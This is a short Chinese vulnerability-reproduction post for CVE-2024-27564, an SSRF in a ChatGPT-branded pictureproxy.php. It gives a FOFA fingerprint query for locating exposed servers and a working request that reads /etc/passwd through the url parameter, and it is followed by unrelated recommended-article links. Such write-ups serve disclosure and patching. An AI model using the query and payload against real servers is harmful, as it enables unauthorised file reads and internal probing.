【漏洞复现】chatgpt pictureproxy.php SSRF漏洞(CVE-2024-27564)

0x01 漏洞概述

ChatGPT pictureproxy.php接口存在服务器端请求伪造 漏洞(SSRF) ,未授权的攻击者可以通过将构建的 URL 注入 url参数来强制应用程序发出任意请求。

0x02 测绘语句

复制代码
fofa: icon_hash="-1999760920"

0x03 漏洞复现

复制代码
GET /pictureproxy.php?url=file:///etc/passwd HTTP/1.1

0x04 影响范围

复制代码
chatgpt

0x05 免责声明

复制代码
本文所涉及的任何技术、信息或工具,仅供学习和参考之用。

请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。

作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。
相关推荐
Predestination王瀞潞7 分钟前
Python oct() 函数
开发语言·python
生物小卡拉11 分钟前
R脚本--PCA分析系列1_v1.0
开发语言·r语言
生物小卡拉12 分钟前
R脚本——LefSE分析与可视化-v1
开发语言·r语言
fl17683127 分钟前
基于python+tkinter实现的自动组卷评卷考试系统python源码+课程设计+项目说明
开发语言·python·课程设计
张较瘦_34 分钟前
应用型本科计算机类专业毕业设计与论文选题指南
java·开发语言·课程设计
Dxy12393102161 小时前
Python自动连接已保存WiFi
开发语言·python
无限进步_1 小时前
C语言指针全面解析:从内存管理到高级应用
c语言·开发语言
W.D.小糊涂1 小时前
Qt 5.14.2+Mysql5.7 64位开发环境下无法连接数据库
开发语言·qt
_OP_CHEN1 小时前
C++基础:(八)STL简介
开发语言·c++·面试·stl
无敌最俊朗@2 小时前
Qt 多线程与并发编程详解
linux·开发语言·qt